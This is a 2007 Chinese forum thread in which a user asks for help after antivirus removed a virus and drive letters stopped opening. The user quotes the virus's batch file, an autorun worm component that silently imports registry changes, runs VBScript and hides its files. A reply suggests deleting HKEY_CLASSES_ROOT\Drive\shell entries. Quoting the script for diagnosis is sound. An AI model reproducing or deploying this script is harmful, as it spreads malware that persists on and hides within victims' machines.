Board logo

标题: 机器中毒了,请帮忙 [打印本页]

作者: frank9494     时间: 2007-1-14 06:00    标题: 机器中毒了,请帮忙

机器的根盘的下面有一个bat文件,我杀毒的时候提示我是叫什么中国黑客的病毒,结果病毒杀掉后双击盘符就没有办法打开了!所以想求得一个解决方案,bat文件的内容如下:
@echo off
rem autorun风暴
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
exit
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
if exist .\autorun.bin type .\autorun.bin >C:\autorun.txt&&exit
if exist %SYSTEMROOT%\system32\autorun.bin type %SYSTEMROOT%\system32\autorun.bin >c:\autorun.txt&&exit
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
:end
作者: tianzizhi     时间: 2007-1-14 09:35
开始--运行--输入regedit,找到[HKEY_CLASSES_ROOT\Drive\shell]将shell下的全部删除